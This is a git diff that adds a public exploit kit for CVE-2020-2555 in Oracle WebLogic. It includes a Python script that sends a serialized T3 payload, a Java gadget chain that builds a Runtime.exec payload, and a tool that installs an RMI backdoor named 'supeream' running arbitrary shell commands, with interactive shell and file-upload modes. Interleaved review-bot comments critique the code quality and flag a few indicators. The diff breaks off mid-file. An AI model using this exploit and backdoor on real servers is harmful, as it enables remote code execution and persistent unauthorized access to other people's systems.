diff --git a/cve/Oracle/2020/CVE-2020-2555/.keep b/cve/Oracle/2020/CVE-2020-2555/.keep
new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.png b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.png
new file mode 100644
index 0000000000000000000000000000000000000000..6fb0ad4b8c1d8810bec09a0c93da8695ce7e63cd
Binary files /dev/null and b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.png differ
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.py b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.py
new file mode 100644
index 0000000000000000000000000000000000000000..611c682868a9de2d6c582d788fb2d02358032e94
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/CVE-2020-2555.py
@@ -0,0 +1,36 @@ +import socket +import os +import sys +import struct + +if len(sys.argv) < 3: + print 'Usage: python %s ' % os.path.basename(sys.argv[0]) + sys.exit() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.settimeout(5) + +server_address = (sys.argv[1], int(sys.argv[2])) +print '[+] Connecting to %s port %s' % server_address +sock.connect(server_address) + +# Send headers +headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' +print 'sending "%s"' % headers +sock.sendall(headers) + +data = sock.recv(1024) +print >>sys.stderr, 'received "%s"' % data + +payloadObj = open(sys.argv[3],'rb').read() + +payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6
c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' +payload=payload+payloadObj +payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6
f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + +payload=struct.pack('>I',len(payload)) + payload[4:] + +print '[+] Sending payload...' +sock.send(payload) +data = sock.recv(1024) +print >>sys.stderr, 'received "%s"' % data \ No newline at end of file diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/README.md b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/README.md new file mode 100644 index 0000000000000000000000000000000000000000..a778480fdb4744e16d1c182181c60d206d069a96 --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/README.md @@ -0,0 +1,11 @@ +# CVE-2020-2555 + +http://1984-0day.com + +https://www.youtube.com/watch?v=VzmZTYbm4Zw + +``` +python CVE-2020-2555.py ip port test.ser +``` + +![png](https://github.com/wsfengfan/CVE-2020-2555/blob/master/CVE-2020-2555.png) 
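Review bot: The argument guard at the top of CVE-2020-2555.py tests `len(sys.argv) < 3`, yet the script later reads `sys.argv[3]`, so a run with only host and port passes the guard and stops with an IndexError after the connection and handshake have already been made; the guard should read `if len(sys.argv) < 4:`, and the usage string should list the three arguments the README shows. `open(sys.argv[3],'rb').read()` leaves the file handle open and the socket is never closed; a `with open(...)` block and a final `sock.close()` would release both. The `print` statements and `print >>sys.stderr` make the file Python 2 only, which deserves a comment at the top. For network monitoring, the handshake literal `PU:t3://us-l-breens:7001` is a fixed string in every run of this script.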
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/CVE_2020_2555.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/CVE_2020_2555.java
new file mode 100644
index 0000000000000000000000000000000000000000..1ba6f2cd743583ae3050ad65286a033362a43f9a
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/CVE_2020_2555.java
@@ -0,0 +1,119 @@ +package com.supeream; + +// com.supeream from https://github.com/5up3rc/weblogic_cmd/ + +import com.supeream.serial.Serializables; +import com.supeream.weblogic.T3ProtocolOperation; +import com.tangosol.util.extractor.ChainedExtractor; +import com.tangosol.util.extractor.ReflectionExtractor; +import com.tangosol.util.filter.LimitFilter; + +import javax.management.BadAttributeValueExpException; +import java.io.FileInputStream; +import java.io.FileOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; + +// com.tangosol.util.extractor.ChainedExtractor from coherence.jar + + +/* + * author:Y4er.com + * + * gadget: + * BadAttributeValueExpException.readObject() + * com.tangosol.util.filter.LimitFilter.toString() + * com.tangosol.util.extractor.ChainedExtractor.extract() + * com.tangosol.util.extractor.ReflectionExtractor.extract() + * Method.invoke() + * ... + * Runtime.getRuntime.exec() + */ + +public class CVE_2020_2555 { + + public static void main(String[] args) throws Exception { + // Runtime.class.getRuntime() + ReflectionExtractor extractor1 = new ReflectionExtractor( + "getMethod", + new Object[]{"getRuntime", new Class[0]} + + ); + + // get invoke() to execute exec() + ReflectionExtractor extractor2 = new ReflectionExtractor( + "invoke", + new Object[]{null, new Object[0]} + + ); + + // invoke("exec","calc") + ReflectionExtractor extractor3 = new ReflectionExtractor( + "exec", + new Object[]{new String[]{"cmd","/c","calc"}} + + ); + + ReflectionExtractor[] extractors = { + extractor1, + extractor2, + extractor3, + }; + + ChainedExtractor chainedExtractor = new ChainedExtractor(extractors); + LimitFilter limitFilter = new LimitFilter(); + + //m_comparator + Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator"); + m_comparator.setAccessible(true); + m_comparator.set(limitFilter, chainedExtractor); + + + //m_oAnchorTop + Field m_oAnchorTop = 
limitFilter.getClass().getDeclaredField("m_oAnchorTop"); + m_oAnchorTop.setAccessible(true); + m_oAnchorTop.set(limitFilter, Runtime.class); + + // BadAttributeValueExpException toString() + // This only works in JDK 8u76 and WITHOUT a security manager + // https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70 + BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null); + Field field = badAttributeValueExpException.getClass().getDeclaredField("val"); + field.setAccessible(true); + field.set(badAttributeValueExpException, limitFilter); + + // serialize + byte[] payload = Serializables.serialize(badAttributeValueExpException); + + // T3 send, you can also use python script. + System.out.print(payload); + //T3ProtocolOperation.send("127.0.0.1", "7001", payload); + + // test + serialize(badAttributeValueExpException); + deserialize(); + + } + + public static void serialize(Object obj) { + try { + ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("test.ser")); + os.writeObject(obj); + os.close(); + } catch (Exception e) { + e.printStackTrace(); + } + } + + public static void deserialize() { + try { + ObjectInputStream is = new ObjectInputStream(new FileInputStream("test.ser")); + is.readObject(); + } catch (Exception e) { + e.printStackTrace(); + } + } +} + + diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/Main.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/Main.java new file mode 100644 index 0000000000000000000000000000000000000000..1dd9124a50b504cebee6187228af1a3bd0903f5f --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/Main.java 
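Review bot: `main()` ends with `serialize(badAttributeValueExpException); deserialize();`, and `deserialize()` calls `readObject()` on `test.ser`, so on a JDK where the chain works, running this class executes the configured command (`cmd /c calc` as written) in the JVM that builds the file; nothing in the source says so. I would add a comment above the `// test` lines such as `// NOTE: deserialize() triggers the chain in this JVM; run only in a disposable VM`, or gate the call behind an explicit argument. Both helpers also leak their streams when an exception is thrown (`os.close()` is skipped, `is` is never closed); try-with-resources covers that, e.g. `try (ObjectInputStream is = new ObjectInputStream(new FileInputStream("test.ser"))) { is.readObject(); }`. `System.out.print(payload)` prints the array reference of the `byte[]`, not its content.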
@@ -0,0 +1,235 @@ +package com.supeream; + +import com.supeream.serial.BytesOperation; +import com.supeream.ssl.WeblogicTrustManager; +import com.supeream.weblogic.WebLogicOperation; +import org.apache.commons.cli.*; +import weblogic.cluster.singleton.ClusterMasterRemote; +import weblogic.jndi.Environment; +import weblogic.utils.encoders.BASE64Encoder; + +import javax.naming.Context; +import javax.naming.NamingException; +import java.io.FileNotFoundException; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.List; +import java.util.Scanner; + + +public class Main { + + public static final String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory"; + public static String TYPE = "streamMessageImpl"; + public static List types = Arrays.asList(new String[]{"marshall", "collection", "streamMessageImpl"}); + public static String version; + public static CommandLine cmdLine; + private static String cmd = "whoami"; + + + public static Context getInitialContext(String url) throws NamingException, FileNotFoundException { + Environment environment = new Environment(); + environment.setProviderUrl(url); + environment.setEnableServerAffinity(false); + environment.setSSLClientTrustManager(new WeblogicTrustManager()); + return environment.getInitialContext(); + } + + public static boolean checkIsAlreadyInstalled(String host, String port) { + try { + System.out.println("检查是否安装rmi实例"); + Context initialContext = getInitialContext(converUrl(host, port)); + ClusterMasterRemote remoteCode = (ClusterMasterRemote) initialContext.lookup("supeream"); + System.out.println("rmi已经安装"); + invokeRmi(remoteCode); + return true; + } catch (Exception e) { + if (e.getMessage() !=null && e.getMessage().contains("supeream")) { + System.out.println("rmi实例不存在"); + } else { + e.printStackTrace(); +// System.exit(0); + } + } + + return false; + } + + public static void executeBlind(String host, String port) throws Exception { + + if (cmdLine.hasOption("B") && 
cmdLine.hasOption("C")) { + System.out.println("执行命令:" + cmdLine.getOptionValue("C")); + WebLogicOperation.blindExecute(host, port, cmdLine.getOptionValue("C")); + System.out.println("执行blind命令完成"); + System.exit(0); + } + + } + + public static String converUrl(String host, String port) { + if (cmdLine.hasOption("https")) { + return "t3s://" + host + ":" + port; + } else { + return "t3://" + host + ":" + port; + } + } + + private static String cdConcat(List cds) { + StringBuffer stringBuffer = new StringBuffer(); + for (String cd: cds) { + stringBuffer.append(cd); + stringBuffer.append("&&"); + } + return stringBuffer.toString(); + } + + public static void invokeRmi(ClusterMasterRemote remoteCode) throws Exception { + String result = null; + + if (Main.cmdLine.hasOption("shell")) { + Scanner scanner = new Scanner(System.in); + List cacheCmds = new ArrayList(); + + while (true) { + System.out.print("please input cmd:>"); + cmd = scanner.nextLine(); + if (cmd.equalsIgnoreCase("exit")) { + System.exit(0); + } + if (cmd.startsWith("cd ")) { + cacheCmds.add(cmd); + } + + if (cmd.equalsIgnoreCase("clear")) { + cacheCmds.clear(); + continue; + } + + if (cmd.equalsIgnoreCase("back")) { + cacheCmds.remove(cacheCmds.size()-1); + continue; + } + + String newCmd = cdConcat(cacheCmds); + + if (!cmd.startsWith("cd ")) { + newCmd += cmd; + } else if (newCmd.length()>3){ + newCmd = newCmd.substring(0, newCmd.length()-2); + } + + + if (Main.cmdLine.hasOption("noExecPath")) { + result = remoteCode.getServerLocation("showmecode$NO$"+newCmd); + } else { + result = remoteCode.getServerLocation("showmecode"+newCmd); + } + + System.out.println(result); + } + } else { + System.out.println("执行命令:" + cmd); + + if (Main.cmdLine.hasOption("noExecPath")) { + result = remoteCode.getServerLocation("showmecode$NO$"+cmd); + } else { + result = remoteCode.getServerLocation("showmecode"+cmd); + } + System.out.println(result); + } + } + + public static void main(String[] args) { + + 
System.setProperty("weblogic.security.allowCryptoJDefaultJCEVerification", "true"); + System.setProperty("weblogic.security.allowCryptoJDefaultPRNG", "true"); + System.setProperty("weblogic.security.SSL.ignoreHostnameVerification", "true"); + System.setProperty("weblogic.security.TrustKeyStore", "DemoTrust"); + + Options options = new Options(); + options.addOption("H", true, "Remote Host[need set]"); + options.addOption("P", true, "Remote Port[need set]"); + options.addOption("C", true, "Execute Command[need set]"); + options.addOption("T", true, "Payload Type" + types); + options.addOption("U", false, "Uninstall rmi"); + options.addOption("B", false, "Runtime Blind Execute Command maybe you should select os type"); + options.addOption("os", true, "Os Type [windows,linux]"); + options.addOption("https", false, "enable https or tls"); + options.addOption("shell", false, "enable shell module"); + options.addOption("upload", false, "enable upload a file"); + options.addOption("src", true, "path to src file "); + options.addOption("dst", true, "path to dst file "); + options.addOption("noExecPath", false, "custom execute path"); + + try { + + String host = "202.60.207.169"; + String port = "7001"; + CommandLineParser parser = new DefaultParser(); + cmdLine = parser.parse(options, args); + + if (cmdLine.hasOption("H")) { + host = cmdLine.getOptionValue("H"); + } else { + HelpFormatter formatter = new HelpFormatter(); + formatter.printHelp("supeream", options); + System.exit(0); + } + + if (cmdLine.hasOption("P")) { + port = cmdLine.getOptionValue("P"); + } + + if (cmdLine.hasOption("C")) { + cmd = cmdLine.getOptionValue("C"); + } + + if (cmdLine.hasOption("T")) { + TYPE = cmdLine.getOptionValue("T"); + } + + if (cmdLine.hasOption("U")) { + System.out.println("开始删除rmi实例"); + WebLogicOperation.unInstallRmi(host, port); + System.out.println("后门删除实例"); + System.exit(0); + } + + executeBlind(host, port); + + if (Main.cmdLine.hasOption("upload") && 
Main.cmdLine.hasOption("src") && Main.cmdLine.hasOption("dst")) { + System.out.println("开始上传文件"); + String path = Main.cmdLine.getOptionValue("src"); + byte[] fileContent = BytesOperation.GetByteByFile(path); + WebLogicOperation.uploadFile(host, port, Main.cmdLine.getOptionValue("dst"), fileContent); + System.out.println("file upload success"); + System.exit(0); + } + + if (checkIsAlreadyInstalled(host, port)) { + System.exit(0); + } + + System.out.println("开始安装rmi实例"); + WebLogicOperation.installRmi(host, port); + System.out.println("等待rmi实例安装成功 "); + Thread.sleep(2000); + + Context initialContext = getInitialContext(converUrl(host, port)); + ClusterMasterRemote remoteCode = (ClusterMasterRemote) initialContext.lookup("supeream"); + invokeRmi(remoteCode); + + } catch (Exception e) { + System.out.println("实例安装失败"); + String msg = e.getMessage(); + if (msg != null && msg.contains("Unrecognized option")) { + HelpFormatter formatter = new HelpFormatter(); + formatter.printHelp("supeream", options); + } else { + System.out.println("实例rmi安装失败 请切换-OB模式"); + e.printStackTrace(); + } + } + + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/PayloadTest.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/PayloadTest.java new file mode 100644 index 0000000000000000000000000000000000000000..7642b8862cd17e03b6a84bc18795317aa4bfe13e --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/PayloadTest.java 
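Review bot: `String host = "202.60.207.169";` in `main()` bakes a routable address into the tool as the default target, although the value is dead: when `-H` is absent the code prints help and exits. Declare it as `String host = null;` so that no later change to the option handling can direct traffic at that address. The status messages are in Chinese while the option help is in English; using one language would make the output easier to search in logs. The catch block prints `实例安装失败` for every exception, including failures of the upload and uninstall paths, so the message should name the step that failed.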
@@ -0,0 +1,22 @@
+package com.supeream.payload;
+
+import com.supeream.serial.BytesOperation;
+import sun.org.mozilla.javascript.internal.DefiningClassLoader;
+
+/**
+ * Created by nike on 17/7/3.
+ */
+public class PayloadTest {
+ public static void main(String[] args) throws Exception {
+// byte[] iRemoteCode = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/supeream/payload/IRemote.class");
+// System.out.println(BytesOperation.bytesToHexString(iRemoteCode));
+ DefiningClassLoader definingClassLoader = new DefiningClassLoader();
+// Class cls = definingClassLoader.defineClass("com.supeream.payload.IRemote",iRemoteCode);
+ byte[] remoteCodeImpl = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/supeream/payload/RemoteImpl.class");
+ System.out.println(BytesOperation.bytesToHexString(remoteCodeImpl));
+
+ Class cls_ = definingClassLoader.defineClass("com.supeream.payload.RemoteImpl", remoteCodeImpl);
+ Class.forName("com.supeream.payload.RemoteImpl");
+ System.out.println(cls_);
+ }
+}
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/RemoteImpl.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/RemoteImpl.java
new file mode 100644
index 0000000000000000000000000000000000000000..2d377292fce3dcfc60988058c645fad08c896dc8
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/payload/RemoteImpl.java
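Review bot: `PayloadTest.main()` reads `RemoteImpl.class` from an absolute path under `/Users/nike/IdeaProjects/`, which exists only on the author's machine, and imports `sun.org.mozilla.javascript.internal.DefiningClassLoader`, a JDK-internal class that, as far as I know, is not shipped with Java 8 and later. Take the class-file path from `args[0]` and use the `org.mozilla.classfile.DefiningClassLoader` that SerialDataGenerator.java already imports. The three commented-out lines can be deleted.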
@@ -0,0 +1,108 @@ +package com.supeream.payload; + +import sun.tools.asm.TryData; +import weblogic.cluster.singleton.ClusterMasterRemote; +import weblogic.utils.encoders.BASE64Decoder; + +import javax.naming.Context; +import javax.naming.InitialContext; +import java.io.BufferedReader; +import java.io.FileOutputStream; +import java.io.InputStreamReader; +import java.rmi.RemoteException; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.List; + +/** + * Created by nike on 17/6/27. + */ + +public class RemoteImpl implements ClusterMasterRemote { + + public static void main(String[] args) { + + try { + RemoteImpl remote = new RemoteImpl(); + + if (args.length == 2 && args[0].equalsIgnoreCase("blind")) { + remote.getServerLocation(args[1]); + } else if (args.length == 1) { + Context ctx = new InitialContext(); + if (args[0].equalsIgnoreCase("install")) { + ctx.rebind("supeream", remote); + } else if (args[0].equalsIgnoreCase("uninstall")) { + ctx.unbind("supeream"); + } + } + } catch (Exception e) { + + } + } + + + @Override + public void setServerLocation(String cmd, String args) throws RemoteException { + + } + + public static void uploadFile(String path, byte[] content) { + try { + FileOutputStream fileOutputStream = new FileOutputStream(path); + fileOutputStream.write(content); + fileOutputStream.flush(); + fileOutputStream.close(); + }catch (Exception e) { + + } + } + + + @Override + public String getServerLocation(String cmd) throws RemoteException { + try { + + if (!cmd.startsWith("showmecode")) { + return "guess me?"; + } else { + cmd = cmd.substring(10); + } + + boolean isLinux = true; + String osTyp = System.getProperty("os.name"); + if (osTyp != null && osTyp.toLowerCase().contains("win")) { + isLinux = false; + } + + List cmds = new ArrayList(); + + if (cmd.startsWith("$NO$")) { + cmds.add(cmd.substring(4)); + }else if (isLinux) { + cmds.add("/bin/bash"); + cmds.add("-c"); + cmds.add(cmd); + } else { + cmds.add("cmd.exe"); + 
cmds.add("/c"); + cmds.add(cmd); + } + + ProcessBuilder processBuilder = new ProcessBuilder(cmds); + processBuilder.redirectErrorStream(true); + Process proc = processBuilder.start(); + + BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream())); + StringBuffer sb = new StringBuffer(); + + String line; + while ((line = br.readLine()) != null) { + sb.append(line).append("\n"); + } + + return sb.toString(); + } catch (Exception e) { + return e.getMessage(); + } + } +} diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/BytesOperation.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/BytesOperation.java new file mode 100644 index 0000000000000000000000000000000000000000..784e416c545ad1b829f209e8fbabbc8554c5086c --- /dev/null +++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/BytesOperation.java 
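Review bot: Nothing in RemoteImpl.java documents that `getServerLocation()` runs its argument as an operating-system command: the class has only a `Created by` stub and reuses the method names of `ClusterMasterRemote`. Add a class comment stating that the object is bound in JNDI under the fixed name `supeream` and executes any string prefixed with `showmecode` through `/bin/bash -c` or `cmd.exe /c`; those two literals are also what an incident responder would search for on a server. The empty `catch (Exception e) { }` blocks in `main()` and `uploadFile()` hide every failure, and the imports `sun.tools.asm.TryData`, `BASE64Decoder` and `Arrays` are unused; `sun.tools.asm.TryData` is a JDK-internal class and should be removed. The `BufferedReader` in `getServerLocation()` is never closed.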
@@ -0,0 +1,75 @@ +package com.supeream.serial; + +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by Fernflower decompiler) +// + +import java.io.FileInputStream; + +public class BytesOperation { + + + public static byte[] hexStringToBytes(String hexString) { + if (hexString != null && !hexString.equals("")) { + hexString = hexString.toUpperCase(); + int length = hexString.length() / 2; + char[] hexChars = hexString.toCharArray(); + byte[] d = new byte[length]; + + for (int i = 0; i < length; ++i) { + int pos = i * 2; + d[i] = (byte) (charToByte(hexChars[pos]) << 4 | charToByte(hexChars[pos + 1])); + } + + return d; + } else { + return null; + } + } + + private static byte charToByte(char c) { + return (byte) "0123456789ABCDEF".indexOf(c); + } + + public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) { + byte[] byte_3 = new byte[byte_1.length + byte_2.length]; + System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length); + System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length); + return byte_3; + } + + public static String bytesToHexString(byte[] src) { + StringBuilder stringBuilder = new StringBuilder(""); + if (src == null || src.length <= 0) { + return null; + } + for (int i = 0; i < src.length; i++) { + int v = src[i] & 0xFF; + String hv = Integer.toHexString(v); + if (hv.length() < 2) { + stringBuilder.append(0); + } + stringBuilder.append(hv); + } + return stringBuilder.toString(); + } + + public static byte[] GetByteByFile(String FilePath) throws Exception { + FileInputStream fi = new FileInputStream(FilePath); + byte[] temp = new byte[50000000]; + int length = fi.read(temp); + byte[] file = new byte[length]; + + for (int i = 0; i < length; ++i) { + file[i] = temp[i]; + } + + fi.close(); + return file; + } + + public static void main(String[] args) throws Exception { + System.out.println(BytesOperation.bytesToHexString(BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/lib/remote.jar"))); + } +} 
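Review bot: `GetByteByFile()` allocates a 50 MB buffer and issues a single `fi.read(temp)`, which may return fewer bytes than the file holds and returns -1 for an empty file, so `new byte[length]` then throws NegativeArraySizeException; the stream also stays open if anything throws. Replace the body with `return java.nio.file.Files.readAllBytes(java.nio.file.Paths.get(FilePath));`. `hexStringToBytes()` silently drops the last character of an odd-length string, and `charToByte()` returns -1 for a non-hex character, which is then OR-ed into the output byte; both cases should raise `IllegalArgumentException`.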
diff --git a/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Reflections.java b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Reflections.java
new file mode 100644
index 0000000000000000000000000000000000000000..81bcbf30cb18066e69b8281bc41502810812b289
--- /dev/null
+++ b/cve/Oracle/2020/CVE-2020-2555/CVE-2020-2555-master/supeream/serial/Reflections.java
@@ -0,0 +1,33 @@
+package com.supeream.serial;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+
+public class Reflections {
+
+ public static Field getField(final Class clazz, final String fieldName) throws Exception {
+ Field field = clazz.getDeclaredField(fieldName);
+ if (field == null && clazz.getSuperclass() != null) {
